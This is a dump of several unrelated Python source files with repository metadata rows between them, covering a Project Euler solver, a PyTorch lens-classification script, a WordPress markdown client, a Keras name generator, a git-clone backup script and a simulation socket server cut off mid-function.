    total = 0
    for letter in name:
        total += ord(letter) - 64
    return total
def solve_p22():
    """Total name score over p022_names.txt.

    The file is a single line of comma-separated, double-quoted names; the
    score of a name is its alphabetical value times its 1-based position in
    the sorted list.
    """
    with open('p022_names.txt', 'r') as fp:
        raw = fp.readline()
    ordered = sorted(entry.strip('"') for entry in raw.split(","))
    return sum((pos + 1) * alphabetical_value(nm)
               for pos, nm in enumerate(ordered))
if __name__ == '__main__':
print(solve_p22()) | UTF-8 | Python | false | false | 996 | py | 49 | p022.py | 48 | 0.680723 | 0.644578 | 0 | 29 | 33.37931 | 77 |
POFK/LensFinder | 876,173,363,298 | d1bfaaf055bf0bacc7960555267588a2eb2764d0 | bcb13b92bf0a1ec85f40c99e9ffa49654bd3a3a5 | /lens/eval.py | 9c9d1732120322d6eee74b0463f21bd45eeec20b | [
"MIT"
] | permissive | https://github.com/POFK/LensFinder | 81fc2c67366396240f6f6d4c2c3ba02fb74a8539 | 56a8cb3f99a68b5922e0a8c76e1cee27ef75a09e | refs/heads/master | "2020-06-10T15:53:42.381966" | "2019-08-23T03:20:16" | "2019-08-23T03:20:16" | 193,665,698 | 0 | 0 | MIT | false | "2019-08-22T04:11:29" | "2019-06-25T08:21:14" | "2019-08-21T10:11:49" | "2019-08-22T04:11:28" | 10,626 | 0 | 0 | 0 | Jupyter Notebook | false | false | #!/usr/bin/env python
# coding=utf-8
import os
import numpy as np
import torch
import h5py
import tqdm
import glob
from torch.utils.data import Dataset, DataLoader, ConcatDataset
from torchvision import transforms
from main import *
random_crop = args.crop_range
#name = 'area1_hdf5_2'
name = 'area2_hdf5'
model_path = '/data/dell5/userdir/maotx/Lens/model/lens_049_40.cpt'
BaseDir = '/data/inspur_disk03/userdir/wangcx/BASS_stack/area2/'+name
OutDir = '/data/dell5/userdir/maotx/Lens/result/{}_{}'.format(
name, model_path.split('/')[-1][:-4])
check_dir(OutDir)
fps = glob.glob(BaseDir + '/*.hdf5')
fps = [i.replace(BaseDir + '/', '') for i in fps]
class HdfDataset(Dataset):
    """Dataset backed by one HDF5 file holding g/r/z image bands per key."""

    def __init__(self, root, path, transform=None):
        """
        Args:
            root: directory containing the HDF5 file.
            path: file name of the HDF5 file, relative to root.
            transform (callable, optional): applied to each 101x101x3 image.
        """
        self.root = root
        self.path = path
        self.transform = transform
        with h5py.File(os.path.join(root, path), 'r') as handle:
            self.keys = list(handle.keys())

    def _init_fn(self, num):
        # DataLoader worker-init hook: open a per-worker file handle.
        self.fp = h5py.File(os.path.join(self.root, self.path), 'r')

    def __len__(self):
        return len(self.keys)

    def __getitem__(self, idx):
        key = self.keys[idx]
        record = self.fp[key]
        # Normalize each band independently, then stack to HWC = 101x101x3.
        bands = [self._center(record[band][...].reshape(-1))
                 for band in ('g', 'r', 'z')]
        image = np.c_[bands[0], bands[1], bands[2]].reshape(101, 101, 3)
        if self.transform:
            image = self.transform(image)
        return {'image': image, 'key': key, 'path': self.path}

    def _center(self, x):
        # Zero-mean / unit-std normalization.
        return (x - x.mean()) / x.std()
class HdfConcatDataset(ConcatDataset):
    """ConcatDataset that forwards the worker-init hook to every child."""

    def _init_fn(self, num):
        for child in self.datasets:
            child._init_fn(num)
class ToTensor(object):
    """HWC numpy image -> CHW torch tensor, values clamped to [-100, 100]."""

    def __call__(self, image):
        chw = np.clip(image.transpose((2, 0, 1)), -100, 100)
        return torch.from_numpy(chw)
class Crop(object):
    """Center-crop an image to a fixed size.

    Args:
        output_size (int or tuple): target (height, width); an int yields a
            square crop.
    """

    def __init__(self, output_size):
        assert isinstance(output_size, (int, tuple))
        if isinstance(output_size, int):
            self.output_size = (output_size, output_size)
        else:
            assert len(output_size) == 2
            self.output_size = output_size

    def __call__(self, image):
        height, width = image.shape[:2]
        crop_h, crop_w = self.output_size
        # Center the crop window inside the image.
        top = (height - crop_h) // 2
        left = (width - crop_w) // 2
        return image[top:top + crop_h, left:left + crop_w]
def eval(BaseDir, fps=[], OutDir=OutDir, model_path=model_path):
    # Run the trained classifier over every HDF5 file listed in fps and write
    # one "<key>\t<p0>\t<p1>" line per object into OutDir/<file>.txt.
    # NOTE(review): `fps=[]` is a mutable default argument (harmless here
    # since the list is never mutated, but worth fixing), and `eval` shadows
    # the builtin of the same name.
    preprocess = transforms.Compose([Crop(random_crop), ToTensor()])
    model, _ = get_model()
    model = torch.nn.DataParallel(model)
    # NOTE(review): this load result is discarded and load() below reads the
    # checkpoint again -- the extra torch.load looks redundant; confirm.
    _ = torch.load(model_path, map_location='cpu')
    model, epoch = load(model_path, model)
    print('loading {}'.format(model_path), epoch)
    model.eval()
    for fp in tqdm.tqdm(fps):
        BASS_ds = HdfDataset(root=BaseDir, path=fp, transform=preprocess)
        BASS_dl = DataLoader(BASS_ds, batch_size=args.batch_size,
                             num_workers=4, worker_init_fn=BASS_ds._init_fn)
        PROB = []
        with torch.no_grad():
            for data_step in BASS_dl:
                key = data_step['key']
                # Per-object sigmoid scores; columns 0 and 1 are written out.
                prob = torch.sigmoid(model(data_step['image'])).numpy()
                PROB.append(zip(key, prob))
        wpath = os.path.join(OutDir, fp.replace('.hdf5','.txt'))
        with open(wpath, 'w') as FP:
            for result in PROB:
                for key, P_value in result:
                    temp = "{}\t{}\t{}\n".format(key, P_value[0], P_value[1])
                    FP.writelines(temp)
if __name__ == "__main__":
eval(BaseDir, fps=fps, OutDir=OutDir, model_path=model_path)
| UTF-8 | Python | false | false | 4,088 | py | 26 | eval.py | 14 | 0.566781 | 0.554795 | 0 | 131 | 30.198473 | 77 |
psyvirgin/markpress | 12,807,592,504,550 | 8d46bd036473cae172d283e8f67f5de1d439217c | 141beebb8650263669d03f1cca1ca1e1c3d4bd64 | /lib/wordpress.py | 57e257324aafc06e34fa9afd363cfe2b34dde63b | [
"MIT"
] | permissive | https://github.com/psyvirgin/markpress | c3eddb8370e7e326e7d01d85f05aff84bcabdc07 | e5f12795b1e82e2223f33953cc9694690c96a959 | refs/heads/master | "2020-03-19T01:05:38.859194" | "2016-04-02T13:56:21" | "2016-04-02T13:56:21" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #! /usr/bin/python
#----------------------------------------------------------------------
#
# wordpress.py - wordpress
#
# NOTE:
# for more information, please see the readme file
#
#----------------------------------------------------------------------
import sys, time, os
import markdown3
import blogpost
#----------------------------------------------------------------------
# global definition
#----------------------------------------------------------------------
def die (message):
    """Write *message* (any object) to stderr and exit with status 1."""
    stream = sys.stderr
    stream.write('{0}\n'.format(message))
    stream.flush()
    sys.exit(1)
#----------------------------------------------------------------------
# configure
#----------------------------------------------------------------------
class configure (object):
    """Project configuration for the markpress tool.

    Reads wordpress.ini (site url/username/password), scans doc/*.md for
    posts, tracks which posts are stale relative to their generated data/
    artifacts, renders markdown to html, and drives the blogpost client.
    """

    def __init__ (self, home = '.'):
        self._dirhome = os.path.abspath(home)
        self._ininame = self.path('wordpress.ini')
        self._inipath = ''
        self._config = {}       # section -> {key: value} from wordpress.ini
        self._posts = []        # one record per doc/*.md
        self._names = []        # becomes {file name: record} after the scan
        self._wordpress = {}    # becomes an object with url/username/password
        self._update_site()
        self._update_posts()

    def path (self, name):
        """Absolute path of *name* relative to the project home."""
        return os.path.abspath(os.path.join(self._dirhome, name))

    def die (self, message):
        """Write *message* to stderr and terminate with exit status 1."""
        sys.stderr.write('%s\n'%message)
        sys.stderr.flush()
        sys.exit(1)
        return 0

    def _read_content (self, name):
        """Read a file's bytes, dropping a UTF-8 BOM if present."""
        content = open(name, 'rb').read()
        if content[:3] == '\xef\xbb\xbf':
            content = content[3:]
        return content

    def _update_site (self):
        """Parse wordpress.ini into self._config and self._wordpress.

        Dies when the file is missing or lacks url/username.
        """
        if not os.path.exists(self._ininame):
            self.die('missing %s\n'%self._ininame)
        import StringIO
        import ConfigParser
        sio = StringIO.StringIO(self._read_content(self._ininame))
        cp = ConfigParser.ConfigParser()
        cp.readfp(sio)
        for sect in cp.sections():
            self._config[sect] = {}
            for key, val in cp.items(sect):
                self._config[sect][key] = val.strip('\r\n\t ')
        class Object (object): pass
        self._wordpress = Object()
        self._wordpress.url = self.config('default', 'url')
        self._wordpress.username = self.config('default', 'username')
        self._wordpress.password = self.config('default', 'password')
        if not self._wordpress.url:
            self.die('can not find url in %s\n'%self._ininame)
        if not self._wordpress.username:
            self.die('can not find username in %s\n'%self._ininame)
        return 0

    def config (self, sect, key, default = None):
        """Look up [sect] key from wordpress.ini, or *default* when absent."""
        if not sect in self._config:
            return default
        val = self._config[sect].get(key, default)
        return val

    def _update_posts (self):
        """Scan doc/*.md and build the post records and the name index."""
        self._posts = []
        self._names = {}
        for fn in os.listdir(self.path('doc')):
            ext = os.path.splitext(fn)[-1].lower()
            if ext != '.md':
                continue
            class Object (object): pass
            main = os.path.splitext(fn)[0]
            post = Object()
            post.name = fn
            post.filename = {}
            post.filename['md'] = self.path('doc/' + fn)
            post.filename['html'] = self.path('data/' + main + '.html')
            post.filename['meta'] = self.path('data/' + main + '.blogpost')
            self._update_info(post)
            self._posts.append(post)
            self._names[fn] = post
        return 0

    def _update_info (self, post):
        """Mark *post* modified when its generated html/meta artifacts are
        missing or older than the markdown source; reset metadata fields.
        """
        # NOTE(review): st_ctime is compared, not st_mtime -- on Linux that
        # is the inode-change time; confirm this is intentional.
        time_md = os.stat(post.filename['md']).st_ctime
        time_html = -1
        time_meta = -1
        post.modified = False
        if os.path.exists(post.filename['html']):
            time_html = os.stat(post.filename['html']).st_ctime
            if time_html < time_md: post.modified = True
        else:
            post.modified = True
        if os.path.exists(post.filename['meta']):
            time_meta = os.stat(post.filename['meta']).st_ctime
            if time_meta < time_md: post.modified = True
        else:
            post.modified = True
        post.title = ''
        post.categories = []
        post.tags = []
        return 0

    def __getitem__ (self, index):
        """Post lookup by file name (string) or by position (int)."""
        if type(index) in (type(''), type(u'')):
            return self._names.get(index)
        return self._posts[index]

    def __contains__ (self, index):
        """Membership test by file name (string) or by position (int)."""
        if type(index) in (type(''), type(u'')):
            return (index in self._names)
        return (index >= 0) and (index < len(self._posts))

    def __len__ (self):
        return len(self._posts)

    def __repr__ (self):
        return repr([ p.name for p in self._posts ])

    def markdown (self, post):
        """Render the post's markdown to html and pull title / categories /
        tags / id / status out of its metadata block.  Returns *post*.
        """
        content = open(post.filename['md'], 'rb').read()
        if content[:3] == '\xef\xbb\xbf':
            content = content[3:]
        content = content.decode('utf-8')
        extras = ['metadata', 'fenced-code-blocks']
        extras.append('cuddled-lists')
        extras.append('tables')
        extras.append('footnotes')
        post.html = markdown3.markdown(content, extras = extras)
        post.metadata = post.html.metadata and post.html.metadata or {}
        post.title = post.metadata.get('title', '').strip('\r\n\t ')
        # categories/tags are comma-separated; blank entries are dropped.
        categories = post.metadata.get('categories', '').split(',')
        tags = post.metadata.get('tags', '').split(',')
        post.categories = []
        post.tags = []
        for n in [ n.strip() for n in categories ]:
            if n: post.categories.append(n)
        for n in [ n.strip() for n in tags ]:
            if n: post.tags.append(n)
        post.id = post.metadata.get('id', None)
        post.status = post.metadata.get('status', 'published').strip()
        return post

    def wordpress (self, options):
        """Invoke the blogpost client.

        *options* is a dict whose entries override the defaults below
        (e.g. command, filename, title, id, categories, status, force).
        Always returns 0; fatal problems terminate via die().
        """
        class Object (object): pass
        opt = Object()
        opt.attributes = []
        opt.asciidoc_opts = []
        opt.categories = ''
        opt.doctype = None
        opt.conf_file = None
        opt.force = False
        opt.force_media = False
        opt.mandatory_parameters = ''
        opt.media_dir = None
        opt.media = True
        opt.dry_run = False
        opt.pages = False
        opt.id = None
        opt.proxy = None
        opt.title = None
        opt.verbose = 0
        opt.command = None
        opt.filename = None
        opt.status = 'published'
        import xmlrpclib
        # Caller-supplied overrides win over the defaults above.
        for n in options:
            opt.__dict__[n] = options[n]
        try:
            blogpost.OPTIONS = opt
            blog = blogpost.Blogpost( \
                self._wordpress.url, \
                self._wordpress.username, \
                self._wordpress.password, \
                opt)
            blog.set_blog_file(opt.filename)
            blog.load_cache()
            blog.get_parameters()
            blog.check_mandatory_parameters()
            blog.title = blog.parameters.get('title', blog.title)
            if opt.title:
                blog.title = opt.title
            if opt.id is not None:
                blog.id = opt.id
            blog.post_type = blog.parameters.get('posttype', blog.post_type)
            if blog.post_type is None:
                blog.post_type = 'post'
            blog.status = blog.parameters.get('status', blog.status)
            if opt.status:
                blog.status = opt.status
            if blog.status is None:
                blog.status = 'published'
            # NOTE(review): this unconditionally overrides the status logic
            # above -- looks like leftover debugging, but kept as-is.
            blog.status = 'published'
            blog.doctype = blog.parameters.get('doctype', blog.doctype)
            if opt.doctype is not None:
                # BUGFIX: was "options.doctype" -- options is a dict, so the
                # attribute access raised AttributeError whenever a doctype
                # was supplied.
                blog.doctype = opt.doctype
            if blog.doctype is None:
                blog.doctype = 'article' # default
            opt.categories = blog.parameters.get('categories', opt.categories)
            command = opt.command
            if command == 'info':
                blog.info()
            elif command == 'categories':
                if opt.categories:
                    blog.set_categories()
                else:
                    blog.list_categories()
            elif command == 'list':
                blog.list()
            elif command == 'delete':
                if blog.id is None:
                    die('missing cache file: specify id please')
                blog.delete()
            elif command == 'dump':
                blog.dump()
            elif command in ('post', 'create', 'update'):
                if blog.id is not None and command == 'create':
                    die('document has been previously posted, use update command')
                if blog.id is None and command == 'update':
                    die('missing cache file: specify id instead')
                # 'post' decides between update/create from the cached id.
                if command == 'update' or \
                    command == 'post' and blog.id is not None:
                    blog.update()
                if command == 'create' or \
                    command == 'post' and blog.id is None:
                    blog.create()
                if opt.categories:
                    blog.set_categories()
            else:
                die('unknown command')
        except xmlrpclib.ProtocolError as e:
            # py2.6+/py3-compatible form; the original "except E, e" is
            # Python-2-only syntax.
            die(e)
        return 0
#----------------------------------------------------------------------
# wordpress
#----------------------------------------------------------------------
class wordpress (object):
def __init__ (self, home = '.'):
self.config = configure(home)
self.verbose = False
def info (self, message):
if self.verbose:
print message
return 0
def warn (self, message):
sys.stderr.write('%s\n'%message)
sys.stderr.flush()
def synchronize (self, name, force = False, verbose = False):
self.verbose = verbose
if os.path.splitext(name)[-1] != '.md':
self.warn('can not synchronize non markdown file')
return -1
if not name in self.config:
self.warn('missing doc/%s in %s'%(name, self.config._dirhome))
return -2
post = self.config[name]
if post.modified == False and force == False:
self.info('[skip: %s]'%name)
return 0
self.info('[synchronizing: %s]'%name)
self.config.markdown(post)
if not post.title:
self.warn('missing title in %s'%(name))
return -3
opt = {}
opt['title'] = post.title.encode('utf-8')
if post.id:
opt['title'] = post.id
if post.categories:
opt['categories'] = (','.join(post.categories)).encode('utf-8')
if post.tags:
opt['tags'] = (','.join(post.tags)).encode('utf-8')
opt['command'] = 'post'
self.info('writing: %s'%post.filename['html'])
fp = open(post.filename['html'], 'wb')
fp.write(post.html.encode('utf-8'))
fp.close()
opt['filename'] = post.filename['html']
opt['status'] = 'published'
opt['force'] = force
self.config.wordpress(opt)
self.info('')
return 0
#----------------------------------------------------------------------
# main
#----------------------------------------------------------------------
def main(args = None):
if args == None:
args = sys.argv
args = [ n for n in args ]
import optparse
description = 'A Wordpress command-line weblog client for markdown'
parser = optparse.OptionParser( \
usage='usage: %prog [OPTIONS] BLOG_FILE',
version='1.0.0',
description = description)
parser.add_option('--force', action='store_true', dest='force',
default = False, help = 'force blog file to upload')
OPTIONS, ARGS = parser.parse_args(args)
if len(ARGS) < 2:
print 'missing blog_file'
return -1
filename = ARGS[1]
print ARGS
wp = wordpress()
wp.synchronize(filename, OPTIONS.force, True)
return 0
#----------------------------------------------------------------------
# testing case
#----------------------------------------------------------------------
if __name__ == '__main__':
def test1():
config = configure('.')
print config.path('.')
print config
print config._wordpress.url
print config._wordpress.username
return 0
def test2():
wp = wordpress()
wp.synchronize('post.3.md', True, True)
return 0
#test2()
main()
| UTF-8 | Python | false | false | 10,294 | py | 3 | wordpress.py | 2 | 0.586847 | 0.582572 | 0.000583 | 362 | 27.428177 | 71 |
Frixoe/canadian-name-generator | 1,142,461,353,662 | 58e96b09f928ae70ab27c91ab52f0f78cee0c1ee | 6fb34a4996dd10d63abb92ca01a56126ecd73b61 | /main.py | b7b42e5519e30e443ef42966be76793dbc906c95 | [
"MIT"
] | permissive | https://github.com/Frixoe/canadian-name-generator | d2e70206fb2ebce4e359eaae1420fb7feff7ae03 | ee041639d4ea1209275a625b1f6ce6caf96bfa0f | refs/heads/master | "2021-06-05T13:49:26.442434" | "2018-09-11T11:13:34" | "2018-09-11T11:13:34" | 148,300,678 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pandas as pd
import numpy as np
import os
os.environ['KERAS_BACKEND'] = 'theano' # Using 'theano' backend for keras
import tensorflow as tf
import keras
from keras.models import Sequential, load_model
from keras.layers import Dense, LSTM, TimeDistributed, Activation
# Loading the data into a DataFrame
df = pd.read_csv("names.csv")
# Converting df column to list
names = list(df["name"][:])
names = [item.lower() for item in names]
#Creating vocab for Index to Char
itc = {key: value for key, value in enumerate(sorted(list(set("".join(names)))))}
itc[26] = "\n"
# Creating vocab for Char to Index
cti = {itc[key]: key for key in itc.keys()}
# Setting the maximum length of a name(CAN BE CHANGED)
max_len = 30
# Create a zeros array with necessary shape
data = np.zeros((len(names), max_len, len(itc.keys())))
# Fill the data array with correct encodings of the names
for i in range(data.shape[0]):
error = False
for j in range(data.shape[1]):
try:
data[i, j, cti[names[i][j]]] = 1
except IndexError:
data[i, j, cti["\n"]] = 1; error = True; break
if not error: data[i, data.shape[1] - 1, cti["\n"]] = 1
# Reassigning the data to training samples X and targets Y
X, Y = np.zeros(data.shape), np.zeros(data.shape)
X[:, :, :], Y[:, :Y.shape[1] - 1, :] = data[:, :, :], data[:, 1:, :]
# Splitting the Data into training and evaluation sets
split_to_and_from = 374000
X_train, Y_train, X_test, Y_test = (X[:split_to_and_from, :, :], Y[:split_to_and_from, :], X[split_to_and_from:, :, :], Y[split_to_and_from:, :])
##### CREATING THE MODEL
# Hyper - params
time_steps = max_len
b_size = 2000
n_cells = 30
l_r = 0.01
print("Creating model...")
global model
model = Sequential([
LSTM(n_cells, input_shape=(None, X.shape[2]), return_sequences=True),
TimeDistributed(Dense(len(cti), activation="softmax"))
])
print("Model created!")
# Compiling the model
model.compile("rmsprop", loss="categorical_crossentropy", metrics=["accuracy"])
def pred(length):
'''
Generate a name with the model.
'''
X_pred = np.zeros((1, length, len(cti)))
pred = [np.random.randint(len(cti) - 1)]
gen = [itc[pred[-1]]]
for i in range(length):
X_pred[0, i, :][pred[-1]] = 1
pred_arr = model.predict(X_pred[:, :, :], batch_size=1, verbose=0)
pred_arr = pred_arr[0, i, :]
p = np.argmax(pred_arr)
pred.append(p)
gen.append(itc[pred[-1]])
return "".join(gen)
def train_model(num_epochs):
print("Training the model now for {} epochs...".format(num_epochs))
current_e = 1
while current_e < num_epochs:
# Fitting the model
model.fit(x=X_train, y=Y_train, batch_size=b_size, epochs=1, verbose=1)
# Generate a name of max_len
print(pred(max_len).strip("\n"))
print("Training complete!")
def save_my_model():
# Saves weights and architecture
model.save("my_keras_model.h5")
# Training the model
train_model(10)
# Save model
save_my_model()
# Evaluating the model
metrics = model.evaluate(x=X_test, y=Y_test, batch_size=100)
print("Model metrics: ")
for m_name, m in zip(model.metrics_names, metrics):
print("{}: {}".format(m_name, m))
| UTF-8 | Python | false | false | 3,148 | py | 4 | main.py | 1 | 0.650572 | 0.635006 | 0 | 121 | 25.016529 | 145 |
MuggleWei/useful_scripts | 7,430,293,468,260 | 53737d148a06aba8152ed65e262075762deb6c7a | dd6ee0d198b200606247a9f98a6036a0556758cf | /essential_sources/essential_sources.py | 9967818ddf96e30e860ce2c30d403684fcd3970d | [] | no_license | https://github.com/MuggleWei/useful_scripts | 03407709900c3a5f40bc87b44430a07cfc6484f8 | 8a9ffa8318254b04ac1e0fc57bf3646f229d094c | refs/heads/master | "2023-07-25T04:44:09.168942" | "2023-07-22T17:39:12" | "2023-07-22T17:39:12" | 80,839,002 | 4 | 1 | null | false | "2023-05-23T02:11:50" | "2017-02-03T15:00:14" | "2022-12-14T22:40:39" | "2023-05-23T02:11:49" | 194 | 4 | 1 | 2 | Vim Script | false | false | """ 下载必备代码库 """
import os
import subprocess
def run_subprocess(args):
"""
运行子进程并实时输出
:param args: 执行的命令
"""
with subprocess.Popen(args, stdout=subprocess.PIPE) as p:
try:
for line in p.stdout:
if not line:
break
print("{}".format(line.decode("utf-8")))
except Exception as e:
print("{} failed: {}".format(args, e))
if __name__ == "__main__":
# 需要备份的代码库
source_list = [
# 自己的代码库
"https://github.com/MuggleWei/mugglec.git",
"https://github.com/MuggleWei/Hakuna_Matata.git",
"https://github.com/MuggleWei/useful_scripts.git",
"https://github.com/MuggleWei/mugglewei.github.io.git",
"https://github.com/MuggleWei/learning_compass.git",
"https://github.com/MuggleWei/babeltrader.git",
"https://github.com/MuggleWei/mugglecpp.git",
"https://github.com/MuggleWei/latency-benchmark.git",
"https://github.com/MuggleWei/callback_benchmark.git",
"https://github.com/MuggleWei/srclient.git",
"https://github.com/MuggleWei/webtoy.git",
"https://github.com/MuggleWei/goev.git",
"https://github.com/MuggleWei/hpb.git",
"https://github.com/MuggleWei/hpkg.git",
# 代码
"https://github.com/python/cpython.git",
"https://github.com/vim/vim.git",
"https://github.com/neovim/neovim.git",
"https://github.com/Kitware/CMake.git",
"https://github.com/wolfSSL/wolfssl.git",
"https://github.com/openssl/openssl.git",
"https://github.com/Mbed-TLS/mbedtls.git",
"https://github.com/gpg/gnupg.git",
"https://github.com/gpg/libgcrypt.git",
"https://github.com/gpg/libgpg-error.git",
"https://github.com/madler/zlib.git",
"https://github.com/facebook/zstd.git",
"https://github.com/mcmilk/7-Zip-zstd.git",
"https://github.com/the-tcpdump-group/libpcap.git",
"https://github.com/libevent/libevent.git",
"https://github.com/sqlite/sqlite.git",
"https://github.com/google/googletest.git",
"https://github.com/gperftools/gperftools.git"
"https://github.com/protocolbuffers/protobuf.git",
"https://github.com/gflags/gflags.git",
"https://github.com/danmar/cppcheck.git",
"https://github.com/leethomason/tinyxml2.git",
"https://github.com/Tencent/rapidjson.git",
"https://github.com/bkaradzic/bgfx.git",
"https://github.com/ocornut/imgui.git",
"https://github.com/ArthurSonzogni/FTXUI.git",
"https://github.com/tcltk/tcl.git", # 编译某些项目时需要此库
"https://github.com/openai/gpt-2.git",
# 学习/博客/例子
# "https://github.com/jiji262/wooyun_articles.git", # 2.5G 太占硬盘了 :(
"https://github.com/wolfSSL/wolfssl-examples.git",
# 日常生活
"https://github.com/shadowsocks/shadowsocks-libev.git",
"https://github.com/adityatelange/hugo-PaperMod.git",
"https://github.com/KaTeX/KaTeX.git",
"https://github.com/mdaines/viz.js.git",
]
# 当前工作目录下的目录
cur_dirs = os.listdir(".")
# 遍历清单, 获取状态
cur_dir = os.getcwd()
for src in source_list:
name = src.split("/")[-1][:-4]
if name in cur_dirs:
print("----------------------------------------------")
print("{}: already exists, git pull".format(name))
# 进入文件夹
os.chdir(name)
# 运行git pull
args = ["git", "pull"]
run_subprocess(args=args)
# 返回原目录
os.chdir(cur_dir)
else:
print("----------------------------------------------")
print("{}: clone".format(name))
# 运行git pull
args = ["git", "clone", src]
run_subprocess(args=args)
| UTF-8 | Python | false | false | 4,057 | py | 104 | essential_sources.py | 51 | 0.557827 | 0.554981 | 0 | 106 | 35.462264 | 75 |
ybdesire/pylearn | 12,756,052,903,444 | 3799b6d8c702a86451e2db0148370e6b36f7ebb3 | 90a1aa497ec53fa87bc31cd5101ad55adb22cddb | /exception/ex_print_error_line.py | 8dfedad23a2fd5208efc49bf1ee5ca929dd1a387 | [] | no_license | https://github.com/ybdesire/pylearn | 39821e3e5cb61c021afc7af2052e0de7077961e2 | 400e525c0529bea6da74aab9bc86fe5e26549d32 | refs/heads/master | "2023-02-04T02:08:44.352846" | "2023-01-28T09:28:34" | "2023-01-28T09:28:34" | 79,337,563 | 2 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
try:
x = 1+1
y = x/0
z = 2+2
except Exception as e:
s = sys.exc_info()
print('exception error msg : {0}'.format(s[1]))
print('exception on line: {0} '.format(s[2].tb_lineno)) | UTF-8 | Python | false | false | 223 | py | 228 | ex_print_error_line.py | 172 | 0.529148 | 0.488789 | 0 | 12 | 16.75 | 59 |
COLAB2/tagsim | 6,949,257,121,157 | 7ae49a43e3d16721de29163afe38e6daa68b5cd9 | 468f88552212e17cec428437d119b824e5660943 | /fieldComparisonMidca.py | 15fcdd3427847381884a2ef77eca5f01e3e5dff3 | [] | no_license | https://github.com/COLAB2/tagsim | c3efb6b4715163b53cfe3328880fd77ffc466722 | 9d4c040a7c842cb14c0075b423345db209e51958 | refs/heads/master | "2022-12-29T02:34:19.339669" | "2020-10-15T14:17:13" | "2020-10-15T14:17:13" | 281,707,413 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import time
import matplotlib.pyplot as plt
from gridworld import Grid
import gridworld
from AcousticTag import AcousticTag
from Agent import Agent
from AcousticReciever import AcousticReciever
import socket
import threading
import traceback
import sys
wp_list = None
allDetectionData = None
allMeasurementData = []
t = 0
endSim = False
def find_max_5_values_avg(time):
a = {}
for each in time:
if each in a:
a[each] += 1
else:
a[each] = 1
values = a.values()
#print ("best 5 values: ")
if values:
values.sort(reverse=True)
#print (values[:5])
#print (sum(values[:5]))
return float(sum(values[:7])) / 7
else:
return 0
def find_max_7_values_avg_measurement(time, data):
    """Average of the largest per-timestamp measurement sums.

    Pairs each timestamp in *time* with the measurement at the same index
    in *data*, sums measurements sharing a timestamp, and averages the
    largest sums.  Returns 0 when *time* is empty.

    NOTE(review): despite the name, this averages the top FIVE sums with a
    fixed divisor of 5 -- kept as-is to preserve caller-visible scaling.
    """
    sums = {}
    for idx, stamp in enumerate(time):
        sums[stamp] = sums.get(stamp, 0) + data[idx]
    if not sums:
        return 0
    # sorted() keeps this Python-3 compatible (values() view has no .sort()).
    ranked = sorted(sums.values(), reverse=True)
    return float(sum(ranked[:5])) / 5
def MidcaComLink():
    """Serve MIDCA planner commands over a local TCP socket on port 5700.

    Blocking accept/recv loop: each incoming connection carries one
    comma-separated command that either steers agent 0 (moveTo, search, ...)
    by rewriting the shared wp_list, or answers a query (get_tags,
    get_measurement, cell_lambda, ...) from the accumulated detection and
    measurement logs.  The loop ends on a 'quit' command or a socket error.
    """
    global running, searchComplete, wp_list, agent, E, det_count, agentList
    run = True
    # create an INET, STREAMing socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # bind the socket to a public host, and a well-known port
    sock.bind(('127.0.0.1', 5700))
    sock.listen(5)
    # accept connections from outside
    (clientsocket, address) = sock.accept()
    # now do something with the clientsocket
    print("starting")
    while run:
        try:
            # one connection per command: accept, read, dispatch, close
            clientsocket, address = sock.accept()
            data = clientsocket.recv(1024)
            data = data.decode('utf-8')
            cmd = data.split(',')
            #print(cmd)
            if cmd[0] == 'quit':
                running = False
                run = False
                # NOTE(review): endSim is not listed in the global statement
                # above, so this assignment binds a local and the module-level
                # endSim flag is never actually set.
                endSim = True
            if cmd[0] == 'start':
                running = True
            if cmd[0] == 'moveTo':
                # cell indices arrive 1-based; steer to that cell's center
                x = int(cmd[1]) - 1
                y = int(cmd[2]) - 1
                center = np.array([x * x_range/5.0, y * y_range/5.0]) + np.array([.5*x_range/5.0, .5*y_range/5.0])
                wp_list[0] = [center]
            if cmd[0] == 'moveToPhysicalPosition':
                x=int(cmd[1])-1
                y=int(cmd[2])-1
                center=np.array([x,y])
                wp_list[0]=[center]
            if cmd[0] == 'inCell':
                # reply whether agent 0 currently occupies cell (x, y)
                agent = agentList[0]
                pos = agent.getPos()
                bin = E.getAbstractPos(pos[0], pos[1])
                x = int(cmd[1])
                y = int(cmd[2])
                myx, myy = E.getCellXY(pos[0], pos[1])
                bin2 = 5 * (y - 1) + (x - 1)
                clientsocket.send(str.encode(str(x == myx and y == myy)))
                #print(bin, bin2)
            if cmd[0] == 'time':
                # current simulation time
                clientsocket.send(str.encode(str(t)))
            if cmd[0] == 'getCell':
                agent = agentList[0]
                pos = agent.getPos()
                bin = E.getAbstractPos(pos[0], pos[1])
                myx, myy = E.getCellXY(pos[0], pos[1])
                clientsocket.send(str.encode(str(myx) + "," + str(myy)))
            if cmd[0] == 'search':
                # queue a waypoint search pattern around the requested cell
                x = int(cmd[1]) - 1
                y = int(cmd[2]) - 1
                center = np.array([x * x_range/5.0, y * y_range/5.0]) + np.array([.5*x_range/5.0, .5*y_range/5.0])
                wp_list[0] = search(wp_list[0], center)
                searchComplete = False
            if cmd[0] == 'searchComplete':
                clientsocket.send(str.encode(str(searchComplete)))
            if cmd[0] == 'get_tags':
                # count unique tag IDs detected in the requested cell
                # NOTE(review): bin here omits the trailing -1 that
                # 'get_measurement' applies -- confirm which indexing the
                # detection log actually uses.
                agent = agentList[0]
                bin = 5 * (int(cmd[2]) - 1) + (int(cmd[1]))
                #print (bin)
                count = 0
                unique = []
                for data in allDetectionData:
                    if (data[3] == bin) and (not data[0] in unique):
                        count = count + 1
                        unique.append(data[0])
                clientsocket.send(str.encode(str(count)))
            if cmd[0] == 'get_measurement':
                # sum the measurements logged at unique positions in the cell
                #allMeasurementData.append([latestMeas, [pos[0], pos[1]], bin])
                # latestMeas, [pos0, pos1], bin
                bin = 5 * (int(cmd[2]) - 1) + (int(cmd[1])) - 1
                print (bin)
                sum = 0
                unique = []
                for data in allMeasurementData:
                    if (data[3] == bin) and (not data[2] in unique):
                        sum += data[0]
                        unique.append(data[2])
                clientsocket.send(str.encode(str(sum)))
            if cmd[0] == "get_adjacent_measurement":
                # per-direction (N, S, E, W) averages of measurement values
                # logged near the edges of the agent's current cell
                agent = agentList[0]
                factor = 2
